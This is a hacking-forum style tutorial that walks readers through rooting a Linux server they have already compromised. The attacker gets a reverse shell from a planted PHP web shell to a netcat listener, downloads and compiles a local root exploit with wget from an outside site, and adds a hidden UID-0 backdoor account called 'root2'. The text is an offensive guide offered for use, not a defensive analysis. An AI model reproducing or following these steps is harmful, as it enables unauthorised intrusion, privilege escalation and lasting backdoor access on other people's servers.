How To Root Server Tutorial By Dr@cul@

    Hi Freinds Iam Dr@cul@ ! welcome to a tutorial on how to root a linux server.
    This is going to be short,HQ tutorial (For better learning)
     
     
    So let's start with things you will need:
     
     
     
    1) Shelled website
    2) Local root exploit
    3) NetCat
     
     
     
    Chapter 1 - Gathering informations
     
     
    Open up your .php shell on a hacked webserver.
    I have mine for an example
     
     
    Now you need to check what kernel your slave is using...
    It should be something like
     
     
    Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
     
     
    Next thing you wanna do is to look for an local root exploit.
    From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
     
     
    Here's the list of exploits
    http://pastebin.com/A0sUhhrz
     
    NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.
     
     
    Chapter 2 - Backconnecting to the server
    For this you will need:
     
     
    1) NetCat
    2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)
     
     
    So open your netcat and type:
    -l -n -v -p 443
    Hit "Enter"
     
     
    Now it should write "listening on [any] 443 ..."
    Good.
    Go back to your shell and go to "BackConnect function"
    Many shells have it.
    Enter your port and press "Connect".
     
    Now it should connect to your netcat
    I got something like this
     
    Chapter 3 - Downloading exploit and executing it
    Now we will need our exploit from Chapter 1
    There's 2 way of uploading:
     
    1) Using shell uploader
    2) Using 'wget' function (Requires backconnection)
     
    I'm going to use 'wget' function because it's easier and faster.
    So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:
    Now it downloaded out exploit named "2.6.18-164.zip" on our server.
     
    If your exploit is downloaded as anyrandomname.c you must compile it
    Do do that first download that exploit and then type:
     
    gcc anyrandomname.c -o anyrandomname
    And our exploit is compiled. (If you get errors when compiling then find another exploit)
    If you downloaded your exploit in zip file anyrandomname.zip type:
     
    unzip anyrandomname.zip
     
    Now you should have your exploit (Like mine "2.6.18-164")
     
    If you completed all steps it's time to get root.
     
    Type:
     
    chmod 777 yourexploit'sname
    With common sense where i typed "yourexploit'sname" you will type your exploit's name.
     
    And one last final step is to run our exploit
    ./yourexploit'sname
     
     
    To check if you got root type
     
    id
    or
    whoami
     
    Mine steps to root
     
    Chapter 4 - Adding root user
    Adding new root user is fairly easy
    We use this command:
    adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
     
    Command explanations:
    Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.
     
    -u 0 -o - Set the value of user id to 0.
     
    -g 0 - Set the initial group number or name to 0
     
    -G 0,1,2,3,4,6,10 - Set supplementary group to:
    0 = root
    1 = bin
    2 = daemon
    3 = sys
    4 = adm
    6 = disk
    10 = wheel
     
    -M - 'home directory' not created for the user.
     
    root2 - User name of the new user account.NOTE: Change root2 to your desired username.
     
    Now you need to set a password for your username.
    Type in next:
    passwd Root2
     
    (Root2 is your username)
     
    See an example
     
    [root@fedora ~]# passwd root2
    Changing password for user root2.
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully.
     
    To check if you did alright
     
    id root2
    (Root2 is your username)
    GNY shell - http://privatepaste.com/1321f97984
    Google - http://google.com
    NetCat - http://downloadnetcat.com/nc11nt.zip
     
    So that concluded our rooting tutorial.
    I hope that someone will learn from this and that this thread will be bookmarked for generations